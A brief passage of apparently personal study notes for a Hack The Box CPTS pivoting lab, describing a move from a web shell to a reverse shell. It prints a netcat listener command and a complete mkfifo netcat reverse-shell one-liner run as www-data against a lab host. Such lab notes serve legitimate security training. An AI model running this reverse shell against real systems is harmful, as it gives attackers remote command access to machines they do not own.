giankabtw/HTB-CPTS/Pivoting, Tunneling, and Port Forwarding.md

 *mlefay:Plain Human work!*

 * **Enumerate the internal network and discover another active host.
 Submit the IP address of that host as the answer.**

+I tried different ways to enumerate the internal network but it wasn't posibble to do with the web shell, I created a reverse shell

+started a nc connection on the attack host

+nc -lvnp 9090

+and a netcat reverse shell on the web shell

+www-data@inlanefreight.local:/home/webadmin# rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.93 9090 > /tmp/f